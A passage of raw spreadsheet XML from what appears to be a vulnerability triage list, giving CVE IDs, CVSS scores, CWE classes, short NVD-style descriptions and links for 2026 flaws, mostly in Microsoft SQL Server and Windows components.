s="5" t="n"><v>0.003</v></c><c r="I247" s="5" t="inlineStr" /><c r="J247" s="5" t="inlineStr" /><c r="K247" s="5" t="inlineStr" /><c r="L247" s="5" t="inlineStr" /><c r="M247" s="5" t="inlineStr" /><c r="N247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O247" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P247" s="5" t="inlineStr" /><c r="Q247" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R247" s="5" t="inlineStr"><is><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is></c><c r="S247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52691</t></is></c></row><row r="248"><c r="A248" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B248" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C248" s="5" t="inlineStr"><is><t>CVE-2026-52775</t></is></c><c r="D248" s="5" t="n"><v>8.800000000000001</v></c><c r="E248" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F248" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G248" s="5" t="inlineStr" /><c r="H248" s="5" t="n"><v>0.003</v></c><c r="I248" s="5" t="inlineStr" /><c r="J248" s="5" t="inlineStr" /><c r="K248" s="5" t="inlineStr" /><c r="L248" s="5" t="inlineStr" /><c r="M248" s="5" t="inlineStr" /><c r="N248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O248" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P248" s="5" t="inlineStr" /><c r="Q248" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R248" s="5" t="inlineStr"><is><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is></c><c r="S248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52775</t></is></c></row><row r="249"><c r="A249" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B249" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C249" s="5" t="inlineStr"><is><t>CVE-2026-55521</t></is></c><c r="D249" s="5" t="n"><v>8.800000000000001</v></c><c r="E249" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F249" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G249" s="5" t="inlineStr" /><c r="H249" s="5" t="n"><v>0.004</v></c><c r="I249" s="5" t="inlineStr" /><c r="J249" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K249" s="5" t="inlineStr" /><c r="L249" s="5" t="inlineStr" /><c r="M249" s="5" t="inlineStr" /><c r="N249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O249" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P249" s="5" t="inlineStr" /><c r="Q249" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R249" s="5" t="inlineStr"><is><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is></c><c r="S249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55521</t></is></c></row><row r="250"><c r="A250" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C250" s="5" t="inlineStr"><is><t>CVE-2026-62706</t></is></c><c r="D250" s="5" t="n"><v>8.800000000000001</v></c><c r="E250" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G250" s="5" t="inlineStr" /><c r="H250" s="5" t="n"><v>0.006</v></c><c r="I250" s="5" t="inlineStr" /><c r="J250" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K25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50" s="5" t="inlineStr" /><c r="M250" s="5" t="inlineStr" /><c r="N250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P250" s="5" t="inlineStr" /><c r="Q250" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="R250" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t></is></c></row><row r="251"><c r="A251" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C251" s="5" t="inlineStr"><is><t>CVE-2026-62744</t></is></c><c r="D251" s="5" t="n"><v>8.800000000000001</v></c><c r="E251" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G251" s="5" t="inlineStr" /><c r="H251" s="5" t="n"><v>0.008</v></c><c r="I251" s="5" t="inlineStr" /><c r="J251" s="5" t="inlineStr" /><c r="K251" s="5" t="inlineStr" /><c r="L251" s="5" t="inlineStr" /><c r="M251" s="5" t="inlineStr" /><c r="N251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P251" s="5" t="inlineStr" /><c r="Q251" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R251" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t></is></c></row><row r="252"><c r="A252" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C252" s="5" t="inlineStr"><is><t>CVE-2026-62895</t></is></c><c r="D252" s="5" t="n"><v>8.800000000000001</v></c><c r="E252" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G252" s="5" t="inlineStr" /><c r="H252" s="5" t="n"><v>0.007</v></c><c r="I252" s="5" t="inlineStr" /><c r="J252" s="5" t="inlineStr" /><c r="K252" s="5" t="inlineStr" /><c r="L252" s="5" t="inlineStr" /><c r="M252" s="5" t="inlineStr" /><c r="N252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P252" s="5" t="inlineStr" /><c r="Q252" s="5" t="inlineStr"><is><t>CWE-1390, CWE-89, CWE-942</t></is></c><c r="R252" s="5" t="inlineStr"><is><t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="S252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t></is></c></row><row r="253"><c r="A253" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C253" s="5" t="inlineStr"><is><t>CVE-2026-65772</t></is></c><c r="D253" s="5" t="n"><v>8.800000000000001</v></c><c r="E253" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G253" s="5" t="inlineStr" /><c r="H253" s="5" t="n"><v>0.008999999999999999</v></c><c r="I253" s="5" t="inlineStr" /><c r="J253" s="5" t="inlineStr" /><c r="K253" s="5" t="inlineStr" /><c r="L253" s="5" t="inlineStr" /><c r="M253" s="5" t="inlineStr" /><c r="N253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P253" s="5" t="inlineStr" /><c r="Q253" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R253" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="S253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t></is></c></row><row r="254"><c r="A254" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C254" s="5" t="inlineStr"><is><t>CVE-2026-66814</t></is></c><c r="D254" s="5" t="n"><v>8.800000000000001</v></c><c r="E254" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F254" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G254" s="5" t="inlineStr" /><c r="H254" s="5" t="n"><v>0.004</v></c><c r="I254" s="5" t="inlineStr" /><c r="J254" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K254" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L254" s="5" t="inlineStr" /><c r="M254" s="5" t="inlineStr" /><c r="N254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P254" s="5" t="inlineStr" /><c r="Q254" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="R254" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t></is></c></row><row r="255"><c r="A255" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C255" s="5" t="inlineStr"><is><t>CVE-2026-66818</t></is></c><c r="D255" s="5" t="n"><v>8.800000000000001</v></c><c r="E255" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F255" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G255" s="5" t="inlineStr" /><c r="H255" s="5" t="n"><v>0.006</v></c><c r="I255" s="5" t="inlineStr" /><c r="J255" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K255" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L255" s="5" t="inlineStr" /><c r="M255" s="5" t="inlineStr" /><c r="N255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P255" s="5" t="inlineStr" /><c r="Q255" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R255" s="5" t="inlineStr"><is><t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t></is></c></row><row r="256"><c r="A256" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C256" s="5" t="inlineStr"><is><t>CVE-2026-66819</t></is></c><c r="D256" s="5" t="n"><v>8.800000000000001</v></c><c r="E256" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F256" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G256" s="5" t="inlineStr" /><c r="H256" s="5" t="n"><v>0.007</v></c><c r="I256" s="5" t="inlineStr" /><c r="J256" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K256" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L256" s="5" t="inlineStr" /><c r="M256" s="5" t="inlineStr" /><c r="N256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P256" s="5" t="inlineStr" /><c r="Q256" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R256" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t></is></c></row><row r="257"><c r="A257" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C257" s="5" t="inlineStr"><is><t>CVE-2026-66820</t></is></c><c r="D257" s="5" t="n"><v>8.800000000000001</v></c><c r="E257" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F257" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G257" s="5" t="inlineStr" /><c r="H257" s="5" t="n"><v>0.005</v></c><c r="I257" s="5" t="inlineStr" /><c r="J257" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K257" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L257" s="5" t="inlineStr" /><c r="M257" s="5" t="inlineStr" /><c r="N257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P257" s="5" t="inlineStr" /><c r="Q257" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R257" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t></is></c></row><row r="258"><c r="A258" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C258" s="5" t="inlineStr"><is><t>CVE-2026-67368</t></is></c><c r="D258" s="5" t="n"><v>8.800000000000001</v></c><c r="E258" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F258" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G258" s="5" t="inlineStr" /><c r="H258" s="5" t="n"><v>0.007</v></c><c r="I258" s="5" t="inlineStr" /><c r="J258" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K258" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L258" s="5" t="inlineStr" /><c r="M258" s="5" t="inlineStr" /><c r="N258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P258" s="5" t="inlineStr" /><c r="Q258" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R258" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t></is></c></row><row r="259"><c r="A259" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C259" s="5" t="inlineStr"><is><t>CVE-2026-67370</t></is></c><c r="D259" s="5" t="n"><v>8.800000000000001</v></c><c r="E259" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G259" s="5" t="inlineStr" /><c r="H259" s="5" t="n"><v>0.007</v></c><c r="I259" s="5" t="inlineStr" /><c r="J259" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K259" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L259" s="5" t="inlineStr" /><c r="M259" s="5" t="inlineStr" /><c r="N259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P259" s="5" t="inlineStr" /><c r="Q259" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R259" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t></is></c></row><row r="260"><c r="A260" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C260" s="5" t="inlineStr"><is><t>CVE-2026-67373</t></is></c><c r="D260" s="5" t="n"><v>8.800000000000001</v></c><c r="E260" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G260" s="5" t="inlineStr" /><c r="H260" s="5" t="n"><v>0.006</v></c><c r="I260" s="5" t="inlineStr" /><c r="J260" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K260" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L260" s="5" t="inlineStr" /><c r="M260" s="5" t="inlineStr" /><c r="N260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P260" s="5" t="inlineStr" /><c r="Q260" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R260" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S260" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t></is></c></row><row r="261"><c r="A261" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C261" s="5" t="inlineStr"><is><t>CVE-2026-67380</t></is></c><c r="D261" s="5" t="n"><v>8.800000000000001</v></c><c r="E261" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F261" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G261" s="5" t="inlineStr" /><c r="H261" s="5" t="n"><v>0.007</v></c><c r="I261" s="5" t="inlineStr" /><c r="J261" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K261" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L261" s="5" t="inlineStr" /><c r="M261" s="5" t="inlineStr" /><c r="N261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P261" s="5" t="inlineStr" /><c r="Q261" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R261" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t></is></c></row><row r="262"><c r="A262" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C262" s="5" t="inlineStr"><is><t>CVE-2026-67381</t></is></c><c r="D262" s="5" t="n"><v>8.800000000000001</v></c><c r="E262" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F262" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G262" s="5" t="inlineStr" /><c r="H262" s="5" t="n"><v>0.005</v></c><c r="I262" s="5" t="inlineStr" /><c r="J262" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K262" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L262" s="5" t="inlineStr" /><c r="M262" s="5" t="inlineStr" /><c r="N262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P262" s="5" t="inlineStr" /><c r="Q262" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R262" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t></is></c></row><row r="263"><c r="A263" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C263" s="5" t="inlineStr"><is><t>CVE-2026-67384</t></is></c><c r="D263" s="5" t="n"><v>8.800000000000001</v></c><c r="E263" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F263" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G263" s="5" t="inlineStr" /><c r="H263" s="5" t="n"><v>0.006</v></c><c r="I263" s="5" t="inlineStr" /><c r="J263" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K263" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L263" s="5" t="inlineStr" /><c r="M263" s="5" t="inlineStr" /><c r="N263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P263" s="5" t="inlineStr" /><c r="Q263" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R263" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t></is></c></row><row r="264"><c r="A264" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C264" s="5" t="inlineStr"><is><t>CVE-2026-67385</t></is></c><c r="D264" s="5" t="n"><v>8.800000000000001</v></c><c r="E264" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F264" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G264" s="5" t="inlineStr" /><c r="H264" s="5" t="n"><v>0.005</v></c><c r="I264" s="5" t="inlineStr" /><c r="J264" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K264" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L264" s="5" t="inlineStr" /><c r="M264" s="5" t="inlineStr" /><c r="N264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P264" s="5" t="inlineStr" /><c r="Q264" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R264" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t></is></c></row><row r="265"><c r="A265" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C265" s="5" t="inlineStr"><is><t>CVE-2026-67388</t></is></c><c r="D265" s="5" t="n"><v>8.800000000000001</v></c><c r="E265" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F265" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G265" s="5" t="inlineStr" /><c r="H265" s="5" t="n"><v>0.005</v></c><c r="I265" s="5" t="inlineStr" /><c r="J265" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K265" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L265" s="5" t="inlineStr" /><c r="M265" s="5" t="inlineStr" /><c r="N265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P265" s="5" t="inlineStr" /><c r="Q265" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R265" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t></is></c></row><row r="266"><c r="A266" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C266" s="5" t="inlineStr"><is><t>CVE-2026-67631</t></is></c><c r="D266" s="5" t="n"><v>8.800000000000001</v></c><c r="E266" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F266" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G266" s="5" t="inlineStr" /><c r="H266" s="5" t="n"><v>0.006</v></c><c r="I266" s="5" t="inlineStr" /><c r="J266" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K266" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L266" s="5" t="inlineStr" /><c r="M266" s="5" t="inlineStr" /><c r="N266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P266" s="5" t="inlineStr" /><c r="Q266" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R266" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t></is></c></row><row r="267"><c r="A267" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C267" s="5" t="inlineStr"><is><t>CVE-2026-67638</t></is></c><c r="D267" s="5" t="n"><v>8.800000000000001</v></c><c r="E267" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F267" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G267" s="5" t="inlineStr" /><c r="H267" s="5" t="n"><v>0.007</v></c><c r="I267" s="5" t="inlineStr" /><c r="J267" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K267" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L267" s="5" t="inlineStr" /><c r="M267" s="5" t="inlineStr" /><c r="N267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P267" s="5" t="inlineStr" /><c r="Q267" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R267" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t></is></c></row><row r="268"><c r="A268" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C268" s="5" t="inlineStr"><is><t>CVE-2026-67639</t></is></c><c r="D268" s="5" t="n"><v>8.800000000000001</v></c><c r="E268" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F268" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G268" s="5" t="inlineStr" /><c r="H268" s="5" t="n"><v>0.007</v></c><c r="I268" s="5" t="inlineStr" /><c r="J268" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K268" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L268" s="5" t="inlineStr" /><c r="M268" s="5" t="inlineStr" /><c r="N268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P268" s="5" t="inlineStr" /><c r="Q268" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R268" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t></is></c></row><row r="269"><c r="A269" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C269" s="5" t="inlineStr"><is><t>CVE-2026-67642</t></is></c><c r="D269" s="5" t="n"><v>8.800000000000001</v></c><c r="E269" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F269" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G269" s="5" t="inlineStr" /><c r="H269" s="5" t="n"><v>0.005</v></c><c r="I269" s="5" t="inlineStr" /><c r="J269" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K269" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L269" s="5" t="inlineStr" /><c r="M269" s="5" t="inlineStr" /><c r="N269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P269" s="5" t="inlineStr" /><c r="Q269" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R269" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t></is></c></row><row r="270"><c r="A270" s="5" t="inlineStr"><is><t>P3 - 